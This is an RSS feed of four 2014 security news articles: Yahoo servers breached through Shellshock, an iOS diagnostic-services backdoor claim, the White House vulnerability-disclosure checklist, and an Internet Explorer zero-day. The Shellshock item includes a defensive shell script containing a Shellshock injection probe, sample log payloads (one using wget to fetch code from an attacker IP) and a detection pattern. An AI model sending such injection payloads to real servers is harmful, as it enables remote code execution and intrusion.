<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>VR World &#187; Vulnerability</title>
	<atom:link href="http://www.vrworld.com/tag/vulnerability/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.vrworld.com</link>
	<description></description>
	<lastBuildDate>Fri, 10 Apr 2015 07:54:22 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=4.1.1</generator>
	<item>
		<title>Yahoo Hacked via Shellshock Vulnerability</title>
		<link>http://www.vrworld.com/2014/10/06/yahoo-hacked-via-shellshock-vulnerability/</link>
		<comments>http://www.vrworld.com/2014/10/06/yahoo-hacked-via-shellshock-vulnerability/#comments</comments>
		<pubDate>Tue, 07 Oct 2014 01:40:08 +0000</pubDate>
		<dc:creator><![CDATA[Anshel Sag]]></dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Cloud Computing]]></category>
		<category><![CDATA[Enterprise]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Bash Bug]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Shellshock]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Yahoo]]></category>
		<category><![CDATA[Yahoo email]]></category>
		<category><![CDATA[Yahoo mail]]></category>

		<guid isPermaLink="false">http://www.brightsideofnews.com/?p=39694</guid>
		<description><![CDATA[<p>The Shellshock bug, also known as the bash bug, already appears to be claiming some major tech companies as its first victims.</p>
<p>The post <a rel="nofollow" href="http://www.vrworld.com/2014/10/06/yahoo-hacked-via-shellshock-vulnerability/">Yahoo Hacked via Shellshock Vulnerability</a> appeared first on <a rel="nofollow" href="http://www.vrworld.com">VR World</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><img width="980" height="600" src="http://cdn.vrworld.com/wp-content/uploads/2014/10/YahooLogo1.jpg" class="attachment-post-thumbnail wp-post-image" alt="Yahoo Logo" /></p><p>A <a href="http://www.futuresouth.us/yahoo_hacked.html" target="_blank">security researcher has discovered</a> that Yahoo has become a victim of the newly discovered <a title="No, Kevin Mitnick is not Selling Zero Day Exploits to Hackers" href="http://www.brightsideofnews.com/2014/09/25/kevin-mitnick-selling-zero-day-exploits-hackers/">Shellshock vulnerability</a> (CVE-2014-6271, also known as the bash bug), with Romanian hackers reportedly using it to gain access to Yahoo&#8217;s systems. Yahoo&#8217;s security team has already confirmed the intrusion <a href="http://www.futuresouth.us/yahoo_response.jpg" target="_blank" rel="lightbox-0">in an email to the researcher</a>. The finding was originally submitted to Yahoo, but it was not eligible for Yahoo&#8217;s bug bounty program, which for some reason does not reward people for finding chinks in Yahoo&#8217;s armor before attackers do. That looks like a significant gap in Yahoo&#8217;s security policies, and one that Marissa Mayer herself ought to address.</p>
<blockquote><p>He states:<br />
Disclosure and disclaimer: This document is being released due to several high profile companies being infiltrated using the recent Shellshock vulnerability, and what I have deemed as an improper response, or lack thereof, to resolving the issue from certain key companies contacted, as well as the FBI. Amongst the affected companies are Yahoo! and Lycos, major players and names in the technology world. This breach affects ALL of us in one way or another, and it’s crucial that this problem be resolved with haste. The FBI took the information down and went on their way. Yahoo! has not responded at all. I’ve attempted to email them, call them, and resorted to contacting Marissa Mayer directly via both email and Twitter, neither to which I have received a response as of yet. The ignoring of this issue is grossly negligent and even almost criminal. As such, I felt that for the safety of anyone using these services, it would be best to publicly disclose as much information as needed to get them moving and working towards resolving the issue before things get worse. All research and testing discussed in this paper was performed by Jonathan D. Hall of Future South Technologies.</p></blockquote>
<p>Yahoo has been struggling to win back users&#8217; trust after its <a href="http://www.forbes.com/sites/jameslyne/2014/01/31/yahoo-hacked-and-how-to-protect-your-passwords/" target="_blank">email data breaches</a> and its broader decline as an internet destination. Under Marissa Mayer, the company has tried to become more of a content provider than a search or news destination. Its most popular applications, such as Flickr, have struggled to retain their audiences and recover the users lost to services like 500px, largely because the company has been unwilling to listen to the community and give it what it wants. Flickr was once the default destination for professional and amateur photographers, and since the service&#8217;s decline plenty of viable competitors have cropped up to fill that role.</p>
<p>The problem for Yahoo is that it does not appear to take security as seriously as it says it does, and it keeps finding itself the target of attackers as a result. Yahoo still has a large user base, Yahoo Mail in particular, which makes it a big, juicy target for attackers who know that Yahoo is slow to adapt and to secure its systems. Security is an ever-evolving game: if your security team is not constantly tracking new threats and actively working to prevent them, you end up like Yahoo, a sitting duck and a popular target.</p>
<p>Yahoo <a href="http://www.businessweek.com/news/2014-10-06/yahoo-says-no-data-stolen-in-shellshock-hack" target="_blank">has told Bloomberg</a> that three of its servers were compromised but that no data was taken. Both halves of that statement still need to be evaluated: a foothold on three servers is enough to pivot further into the network, and &#8220;no data was taken&#8221; is hard to establish until the forensic work on those hosts, and on whatever they could reach, is finished.</p>
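<p>For readers who run Linux or BSD hosts, the checks below are an added example; they are not code from this article or from the researcher it cites. The first function is the standard local probe for CVE-2014-6271: bash imported shell functions from any environment variable whose value started with &#8220;() {&#8221;, and an unpatched bash also executed whatever followed the closing brace while parsing it. The second function models why web servers were the first victims: CGI hands every request header to the child process as an environment variable, so an anonymous client controls an env var before bash even starts. The third scans access-log lines for the telltale prefix. The log lines are constructed for the example, not real traffic; the script assumes a POSIX sh with env and grep, and bash on the PATH for the two probes. One caveat: the first upstream fix was incomplete (CVE-2014-7169 followed), so a host that passes this probe should still be carrying the full patch series.</p>

```shell
#!/bin/sh
# Added example, not code from the VR World article or from the researcher it
# cites. Assumes a POSIX sh with env and grep, and bash on PATH for the probes.
# The log lines below are constructed for the example, not real traffic.

# 1. Local probe for CVE-2014-6271. An unpatched bash runs the command that
#    follows the function body while importing the variable; a patched bash
#    treats the value as an ordinary string and prints only "probe".
shellshock_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    out=$(env x='() { :;}; echo SHELLSHOCKED' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCKED*) echo "vulnerable" ;;
        *)              echo "patched" ;;
    esac
}

# 2. The CGI hand-off: the web server exports request headers such as
#    User-Agent as HTTP_USER_AGENT before running the script. On an unpatched
#    bash the attacker's trailing command runs before the "script" does; on a
#    patched bash the header value is simply echoed back as data.
cgi_hand_off() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    HTTP_USER_AGENT="$1" bash -c 'echo "served: $HTTP_USER_AGENT"' 2>/dev/null
}

# 3. Detection after the fact. Constructed access-log lines: two Shellshock
#    probes (one via User-Agent, one via Referer) and two benign requests.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
198.51.100.20 - - [25/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:02:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; wget http://203.0.113.5/x" "curl/7.37.0"
192.0.2.9 - - [25/Sep/2014:10:03:00 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" "Googlebot/2.1"'

# The telltale is the function-definition prefix "() {" (spaces optional)
# anywhere in a header value. Prints the matching lines.
find_shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | grep -E '\(\) *\{'
}

# Number of matching lines, for scripted use (2 for the sample above).
count_shellshock_probes() {
    find_shellshock_probes | grep -c .
}

echo "local bash: $(shellshock_check)"
echo "CGI hand-off: $(cgi_hand_off '() { :;}; echo INJECTED')"
find_shellshock_probes
```

<p>The log pattern is deliberately loose: attackers varied the spacing inside the prefix, and the payload can sit in any header the server exports, so match on the prefix rather than on a particular command, then pull the full request line for every hit.</p>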
]]></content:encoded>
			<wfw:commentRss>http://www.vrworld.com/2014/10/06/yahoo-hacked-via-shellshock-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Researcher Claims iOS Devices Have a Backdoor</title>
		<link>http://www.vrworld.com/2014/07/23/security-researcher-claims-ios-devices-backdoor/</link>
		<comments>http://www.vrworld.com/2014/07/23/security-researcher-claims-ios-devices-backdoor/#comments</comments>
		<pubDate>Wed, 23 Jul 2014 19:29:35 +0000</pubDate>
		<dc:creator><![CDATA[Anshel Sag]]></dc:creator>
				<category><![CDATA[Cloud Computing]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Rumors]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[CIA]]></category>
		<category><![CDATA[com.apple.mobile.pcapd]]></category>
		<category><![CDATA[FBI]]></category>
		<category><![CDATA[Firmware]]></category>
		<category><![CDATA[iOS]]></category>
		<category><![CDATA[Jonathan Zdziarski]]></category>
		<category><![CDATA[NSA]]></category>
		<category><![CDATA[Secure]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://www.brightsideofnews.com/?p=36690</guid>
		<description><![CDATA[<p>A security researcher is claiming to have found a set of services in iOS that appear to be a firmware-level backdoor in iOS devices. What&#8217;s ...</p>
<p>The post <a rel="nofollow" href="http://www.vrworld.com/2014/07/23/security-researcher-claims-ios-devices-backdoor/">Security Researcher Claims iOS Devices Have a Backdoor</a> appeared first on <a rel="nofollow" href="http://www.vrworld.com">VR World</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><img width="960" height="960" src="http://cdn.vrworld.com/wp-content/uploads/2014/05/AppleLogo1.jpg" class="attachment-post-thumbnail wp-post-image" alt="Apple Logo iMessage iWatch Backdoor" /></p><p>A <a href="http://www.zdziarski.com/blog/?p=3441" target="_blank">security researcher is claiming to have found</a> a set of services in iOS that appear to be a firmware-level backdoor in iOS devices. What&#8217;s more interesting is that Apple has, in a very non-Apple manner, responded to his claims by <a href="https://support.apple.com/kb/HT6331?viewlocale=en_US&amp;locale=en_US" target="_blank">posting a support page about it</a>. He reads that page as confirmation of the services he found, which Apple says it uses for diagnostic and enterprise purposes. These services are not open to just anyone: Apple&#8217;s page says each one requires the device to be unlocked and to have trusted a paired computer, so the parties with access are Apple, a support technician, an enterprise IT host, or, as the researcher points out, anyone holding a pairing record copied from a computer the device has trusted. That makes them relatively well-guarded backdoors, but backdoors nonetheless. Most consumers are completely unaware that alternative pathways into their devices exist and can be used by someone other than themselves. This is also why remote bricking and other &#8216;security&#8217; features being pushed through legislatures are a problem, but at least we know those exist, unlike these services in iOS.</p>
<p>The services in question, com.apple.mobile.pcapd, com.apple.mobile.file_relay and com.apple.mobile.house_arrest among others, have been addressed in <a href="https://support.apple.com/kb/HT6331?viewlocale=en_US&amp;locale=en_US" target="_blank">Apple&#8217;s knowledge base article</a>. Apple does not directly address <a href="https://twitter.com/JZdziarski" target="_blank">Jonathan Zdziarski&#8217;</a>s claims but instead explains what each service is meant for: pcapd captures network packets from the device to a trusted computer for troubleshooting, file_relay copies a limited set of diagnostic data for Apple engineering and AppleCare, and house_arrest is how iTunes and Xcode move documents to and from apps that support file sharing. Those are plausible purposes, but the fact that such services run without most users&#8217; or developers&#8217; knowledge, and that the researcher found them reachable with a copied pairing record, is still worrisome.</p>
<p>Whatever is really happening, customers should be aware of how intrusive some of these services are or can be. Some are limited in what they can reach, but even so, Apple should tell customers, when they set up the operating system or when the services are used, that there are services on their devices that give Apple, and anyone holding a trusted pairing record, access to them. Backdoor systems are not a joke: a diagnostic channel that sits outside the controls the user can see is an invitation to attackers to find their own way to it. Backdoors are inherently risky, and consumers should be made aware of them, malicious or not. The practical mitigation on the user&#8217;s side is to be careful about which computers the device is told to trust, since the pairing record on any of them is a key to these services.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.vrworld.com/2014/07/23/security-researcher-claims-ios-devices-backdoor/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The White House Says They Have Right to Withhold a Security Vulnerability</title>
		<link>http://www.vrworld.com/2014/05/01/whitehouse-says-right-withhold-security-vulnerability/</link>
		<comments>http://www.vrworld.com/2014/05/01/whitehouse-says-right-withhold-security-vulnerability/#comments</comments>
		<pubDate>Thu, 01 May 2014 18:49:57 +0000</pubDate>
		<dc:creator><![CDATA[Anshel Sag]]></dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[CIA]]></category>
		<category><![CDATA[FBI]]></category>
		<category><![CDATA[Heartbleed]]></category>
		<category><![CDATA[NSA]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Whitehouse]]></category>

		<guid isPermaLink="false">http://www.brightsideofnews.com/?p=34849</guid>
		<description><![CDATA[<p>On Monday, as a follow up to the awareness around the Heartbleed bug and all of the rumors that circulated around it, The White House posted ...</p>
<p>The post <a rel="nofollow" href="http://www.vrworld.com/2014/05/01/whitehouse-says-right-withhold-security-vulnerability/">The White House Says They Have Right to Withhold a Security Vulnerability</a> appeared first on <a rel="nofollow" href="http://www.vrworld.com">VR World</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><img width="2000" height="1361" src="http://cdn.vrworld.com/wp-content/uploads/2014/05/WhiteHouse_Logo1.png" class="attachment-post-thumbnail wp-post-image" alt="Whitehouse Logo" /></p><p>On Monday, as a follow-up to the attention around <a title="The NSA Exploited the OpenSSL Heartbleed Bug for 2 Years" href="http://www.brightsideofnews.com/2014/04/11/the-nsa-exploited-the-openssl-heartbleed-bug-for-2-years/">the Heartbleed bug</a> and all of the rumors that circulated around it, <a href="http://www.whitehouse.gov/blog/2014/04/28/heartbleed-understanding-when-we-disclose-cyber-vulnerabilities" target="_blank">the White House posted a blog</a>, written by cybersecurity coordinator Michael Daniel, clarifying how the administration approaches vulnerabilities such as Heartbleed. The NSA had already categorically denied any prior knowledge of the <a href="https://twitter.com/NSA_PAO/status/454720059156754434" target="_blank">Heartbleed bug, officially, on Twitter</a>, but an agency that has been known to lie to Congress and the American people without hesitation does not get the benefit of the doubt, so that denial carries less weight than it otherwise would.</p>
<p>So, what exactly will they disclose, and when? The White House has provided a checklist so that we know when an agency may withhold knowledge of a vulnerability from the public and when it should make it public:</p>
<blockquote>
<p class="p1">We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:</p>
</blockquote>
<ul>
<li class="p2">
<blockquote><p>How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>Does the vulnerability, if left unpatched, impose significant risk?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>How likely is it that we would know if someone else was exploiting it?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>How badly do we need the intelligence we think we can get from exploiting the vulnerability?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>Are there other ways we can get it?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>Could we utilize the vulnerability for a short period of time before we disclose it?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>How likely is it that someone else will discover the vulnerability?</p></blockquote>
</li>
<li class="p2">
<blockquote><p>Can the vulnerability be patched or otherwise mitigated?</p></blockquote>
</li>
</ul>
<p>So, basically, the White House and the Obama administration are saying that if a vulnerability doesn&#8217;t affect us too much but can gain us lots of valuable intelligence, we should keep our mouths shut. What is striking about this supposedly &#8220;rigorous&#8221; process for vulnerability disclosure is that it sets no time limit on how long an agency may wait before disclosing a vulnerability. There is no cap on how long a vulnerability can be left open once it passes the checks they have established. The post mentions utilizing a vulnerability &#8220;for a short period of time,&#8221; but that phrase does not actually mean anything, because a short period of time could be a day, a week, a month, or a year.</p>
<p>With the Heartbleed bug (CVE-2014-0160) and the public disclosure around it, a lot of companies scrambled to patch, and some attacks that used it followed immediately after disclosure. Had it been left unpatched, Heartbleed would have had disastrous implications: the bug let an unauthenticated client read up to 64 KB of a vulnerable server&#8217;s memory per request, leaving no trace in ordinary application logs, and repeated requests turn that into private keys, session cookies and credentials for any government that knew about it. That also makes the checklist question of how likely it is that &#8220;we would know if someone else was exploiting it&#8221; a pointed one, since in this case the answer was almost certainly no. As a result, many people simply do not believe that the White House and the NSA were unaware of such a bug, especially since the NSA has quietly exploited countless other bugs without any apparent concern.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.vrworld.com/2014/05/01/whitehouse-says-right-withhold-security-vulnerability/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Time to Run and Hide from Internet Explorer, For Now</title>
		<link>http://www.vrworld.com/2014/04/29/time-run-hide-internet-explorer-now/</link>
		<comments>http://www.vrworld.com/2014/04/29/time-run-hide-internet-explorer-now/#comments</comments>
		<pubDate>Tue, 29 Apr 2014 19:19:02 +0000</pubDate>
		<dc:creator><![CDATA[Anshel Sag]]></dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[IE11]]></category>
		<category><![CDATA[IE6]]></category>
		<category><![CDATA[IE9]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Operation Clandestine Fox]]></category>
		<category><![CDATA[Remote Code Execution]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Zero Day]]></category>

		<guid isPermaLink="false">http://www.brightsideofnews.com/?p=34780</guid>
		<description><![CDATA[<p>Internet Explorer has had a pretty bad reputation over the years as a pretty awful browser, and from the IE6 through the IE9 days, that ...</p>
<p>The post <a rel="nofollow" href="http://www.vrworld.com/2014/04/29/time-run-hide-internet-explorer-now/">Time to Run and Hide from Internet Explorer, For Now</a> appeared first on <a rel="nofollow" href="http://www.vrworld.com">VR World</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><img width="1920" height="1200" src="http://cdn.vrworld.com/wp-content/uploads/2014/04/IE9V2_31.jpg" class="attachment-post-thumbnail wp-post-image" alt="Internet Explorer" /></p><p>Internet Explorer has had a bad reputation over the years as an awful browser, and from IE6 through IE9 that reputation was well earned. Nowadays, though, Internet Explorer is fairly good and the only browser on Windows worth anything for touch. The guys and gals over at <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" target="_blank">FireEye discovered this zero-day exploit</a> and dubbed the campaign &#8220;Operation Clandestine Fox.&#8221; They report that the exploit targets IE9 through IE11, which together make up about 26% of browser users worldwide, a significant share. Microsoft has <a href="https://technet.microsoft.com/en-US/library/security/2963983" target="_blank">also put out a security advisory</a> (2963983, covering CVE-2014-1776) stating that IE6 through IE11 are affected, which broadens the scope of the issue by millions more users.</p>
<p>While Microsoft says the issue is being used in &#8220;limited attacks,&#8221; the potential for the attack to spread is now much greater, since the issue is public but not yet fixed. We don&#8217;t know how long FireEye gave Microsoft to resolve the issue before announcing it, but I have a feeling they didn&#8217;t just post about it and leave Microsoft to deal with the repercussions. Microsoft takes security much more seriously than it once did, which is what makes this IE zero-day all the more puzzling. That such a bug has survived through potentially every version of IE and only been caught now is also a bit suspicious (now that we live in the post-Snowden era, where anything could be deliberate).</p>
<p>As described by the FireEye team, the exploit leverages a previously unknown use-after-free vulnerability in Internet Explorer and uses a well-known Flash exploitation technique to achieve arbitrary memory access and bypass Windows&#8217; ASLR and DEP protections. Note what that division of labor means: the bug is in IE, while Flash is the tool the attackers use to arrange memory and defeat the mitigations. What this means for users is that if you&#8217;re using Internet Explorer right now, you should probably stop and switch to Chrome or Firefox until the issue is resolved. Personally, I use four different browsers simultaneously, but I don&#8217;t really recommend that to anyone, especially in this case. If you absolutely must use Internet Explorer, disable Flash (or uninstall it) and run a proper anti-virus application alongside the browser. Disabling Flash breaks the exploit chain seen in the wild, but it does not fix the use-after-free itself, so the browser stays exposed to any attacker who builds a different path to it; apply Microsoft&#8217;s fix as soon as it ships. It would still be easier to use Chrome or Firefox in the meantime.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.vrworld.com/2014/04/29/time-run-hide-internet-explorer-now/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
